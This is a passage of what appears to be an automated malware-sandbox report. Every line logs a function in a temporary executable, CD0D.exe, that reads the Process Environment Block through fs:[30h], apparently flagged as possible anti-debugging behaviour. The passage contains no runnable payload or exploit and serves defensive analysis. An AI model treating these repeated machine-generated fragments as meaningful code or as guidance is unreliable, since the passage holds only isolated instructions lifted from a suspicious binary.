              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A4257 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912240 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912240 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A4248 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A95927A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CB260 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CB260 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8A62 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914B94 mov edi, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9BEB8A mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9BEB8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9BEB8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9BEB8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D138A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E9BBE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8BB6 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1BA8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944BAD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944BAD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944BAD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9953CA mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9953CA mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9123F6 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A911BE9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93DBE9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C23E3 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C23E3 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C23E3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D131B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A4320 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8B58 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B5A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B5A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B5A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B5A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F340 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B7A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943B7A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A6365 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A6365 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A6365 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913880 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913880 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94F0BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94F0BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94F0BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9590AF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228AE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228AE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228AE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228AE mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228AE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228AE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9170C0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9170C0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228FD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228FD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9228FD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9140E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9140E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9140E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93B8E4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93B8E4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9158EC mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9EF019 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9EF019 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F018 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F018 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E4015 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E4015 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916800 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916800 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916800 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A928800 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A830 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A830 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A830 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A830 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944020 mov edi, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915050 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915050 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915050 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A917055 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E1074 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D2073 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93F86D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944190 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942990 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91519E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91519E mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93C182 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94A185 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DA189 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DA189 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9951BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9951BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9951BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9951BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9461A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9461A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D49A4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9131E0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A41E8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E89E7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A919100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A920100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A920100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A920100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913138 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94513A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94513A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91395E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91395E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93B944 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93B944 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B171 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91B171 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8966 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DE962 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DE9E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DE9E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DE9E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913E80 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913E80 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A2EA3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9946A7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8ED6 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9436CC mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A953EE4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A953EE4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A953EE4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9416E0 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A2E14 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91C600 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91C600 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91C600 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CFE3F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91A63B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91A63B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A950E21 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A995623 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A6652 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A943E70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912FB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913FC5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913FC5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913FC5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9537F5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9437EB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944710 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93F716 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9AFF10 mov eax, dword ptr fs:[00000030h]
